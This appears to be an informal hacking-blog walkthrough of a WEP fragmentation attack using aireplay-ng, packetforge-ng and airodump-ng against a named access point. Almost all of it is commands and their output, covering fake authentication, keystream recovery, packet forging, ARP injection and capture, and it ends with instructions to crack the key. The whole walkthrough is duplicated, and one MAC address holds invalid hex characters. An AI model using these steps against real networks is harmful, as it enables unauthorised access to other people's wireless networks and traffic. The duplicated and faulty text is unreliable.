fragmentation attack with aireplay-ng
basically, the program obtains a small amount of keying material from the packet
then attempts to send ARP and/or LLC packets with known content to the access point.
if the packet is successfully echoed back by the access point then a larger amount
of keying information can be obtained from the returned packet.
scenario
ESSID : wireless
BSSID : 00:02:6F:23:2B:67
CLIENT MAC : 00:02:4G:87:22:FG
[o] u need to authenticate with the access point.
root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:58:55 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:58:55 Sending Authentication Request (Open System)
09:58:55 Authentication successful
09:58:55 Sending Association Request
09:58:55 Association successful :-) (AID: 1)
09:59:10 Sending keep-alive packet
09:59:25 Sending keep-alive packet
09:59:40 Sending keep-alive packet
[o] run standard ARP request replay
root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
08:07:58 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
Saving ARP requests in replay_arp-0706-080758.cap
You should also start airodump-ng to capture replies.
728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
as u can see i got 0 ARP request
[o] fragmentation attack!
root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:59:00 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:59:00 Waiting for a data packet...
Read 432 packets...
Size: 112, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG
0x0000: 0842 2c00 0002 6f87 11fe 0002 6f55 2bd2 .B,...o.....oU+.
0x0010: 000c 4252 2553 e05c 1398 2200 e7b4 f9fa ..BR%S.\..".....
0x0020: a786 d686 bfd1 8151 5bcf a8cb eac8 a10a .......Q[.......
0x0030: 52a9 49c5 ade4 de32 ef4b 294e c961 7de0 R.I....2.K)N.a}.
0x0040: 95ce afe7 ae32 225e 3af0 73db e7aa 47e4 .....2"^:.s...G.
0x0050: 6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e `S.L...[........
0x0060: 82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520 ....1.....Nw...
Use this packet ? y
Saving chosen packet in replay_src-0706-095931.cap
09:59:34 Data packet found!
09:59:34 Sending fragmented packet
09:59:34 Got RELAYED packet!!
09:59:34 Trying to get 384 bytes of a keystream
09:59:35 No answer, repeating...
09:59:35 Trying to get 384 bytes of a keystream
09:59:35 Trying a LLC NULL packet
09:59:37 No answer, repeating...
09:59:37 Trying to get 384 bytes of a keystream
09:59:39 No answer, repeating...
09:59:39 Trying to get 384 bytes of a keystream
09:59:39 Trying a LLC NULL packet
09:59:39 Got RELAYED packet!!
09:59:39 Trying to get 1500 bytes of a keystream
09:59:39 Got RELAYED packet!!
Saving keystream in fragment-0706-095939.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[o] build u'r packet with packetforge-ng
root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx
Wrote packet to: privx
[o] use privx to capture ARP request
root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG
0x0000: 0841 0201 0002 6f55 2bd2 0002 6f87 11fe .A....oU+...o...
0x0010: ffff ffff ffff 8001 3e98 2200 3a8c be0b ........>.".:...
0x0020: 0926 44f8 fe6a c35c d517 3ff1 2a8b 95df .&D..j.\..?.*...
0x0030: 97eb b45d bab9 b71b e777 edc7 8678 f1e7 ...].....w...x..
0x0040: d1b2 68b7 ..h.
Use this packet ? y
Saving chosen packet in replay_src-0706-100037.cap
You should also start airodump-ng to capture replies.
Sent 37888 packets...(150 pps)
[o] ARP request start to showing some result [check standard ARP request replay]
422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)
[o] run airodump-ng to capture replies
root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0
CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless
BSSID STATION PWR Rate Lost Packets Probes
00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477
[o] crack u'r .cap file to find the key!
then attempts to send ARP and/or LLC packets with known content to the access point.
if the packet is successfully echoed back by the access point then a larger amount
of keying information can be obtained from the returned packet.
scenario
ESSID : wireless
BSSID : 00:02:6F:23:2B:67
CLIENT MAC : 00:02:4G:87:22:FG
[o] u need to authenticate with the access point.
root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:58:55 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:58:55 Sending Authentication Request (Open System)
09:58:55 Authentication successful
09:58:55 Sending Association Request
09:58:55 Association successful :-) (AID: 1)
09:59:10 Sending keep-alive packet
09:59:25 Sending keep-alive packet
09:59:40 Sending keep-alive packet
[o] run standard ARP request replay
root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
08:07:58 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
Saving ARP requests in replay_arp-0706-080758.cap
You should also start airodump-ng to capture replies.
728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
as u can see i got 0 ARP request
[o] fragmentation attack!
root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:59:00 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:59:00 Waiting for a data packet...
Read 432 packets...
Size: 112, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG
0x0000: 0842 2c00 0002 6f87 11fe 0002 6f55 2bd2 .B,...o.....oU+.
0x0010: 000c 4252 2553 e05c 1398 2200 e7b4 f9fa ..BR%S.\..".....
0x0020: a786 d686 bfd1 8151 5bcf a8cb eac8 a10a .......Q[.......
0x0030: 52a9 49c5 ade4 de32 ef4b 294e c961 7de0 R.I....2.K)N.a}.
0x0040: 95ce afe7 ae32 225e 3af0 73db e7aa 47e4 .....2"^:.s...G.
0x0050: 6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e `S.L...[........
0x0060: 82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520 ....1.....Nw...
Use this packet ? y
Saving chosen packet in replay_src-0706-095931.cap
09:59:34 Data packet found!
09:59:34 Sending fragmented packet
09:59:34 Got RELAYED packet!!
09:59:34 Trying to get 384 bytes of a keystream
09:59:35 No answer, repeating...
09:59:35 Trying to get 384 bytes of a keystream
09:59:35 Trying a LLC NULL packet
09:59:37 No answer, repeating...
09:59:37 Trying to get 384 bytes of a keystream
09:59:39 No answer, repeating...
09:59:39 Trying to get 384 bytes of a keystream
09:59:39 Trying a LLC NULL packet
09:59:39 Got RELAYED packet!!
09:59:39 Trying to get 1500 bytes of a keystream
09:59:39 Got RELAYED packet!!
Saving keystream in fragment-0706-095939.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[o] build u'r packet with packetforge-ng
root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx
Wrote packet to: privx
[o] use privx to capture ARP request
root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG
0x0000: 0841 0201 0002 6f55 2bd2 0002 6f87 11fe .A....oU+...o...
0x0010: ffff ffff ffff 8001 3e98 2200 3a8c be0b ........>.".:...
0x0020: 0926 44f8 fe6a c35c d517 3ff1 2a8b 95df .&D..j.\..?.*...
0x0030: 97eb b45d bab9 b71b e777 edc7 8678 f1e7 ...].....w...x..
0x0040: d1b2 68b7 ..h.
Use this packet ? y
Saving chosen packet in replay_src-0706-100037.cap
You should also start airodump-ng to capture replies.
Sent 37888 packets...(150 pps)
[o] ARP request start to showing some result [check standard ARP request replay]
422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)
[o] run airodump-ng to capture replies
root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0
CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless
BSSID STATION PWR Rate Lost Packets Probes
00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477
[o] crack u'r .cap file to find the key!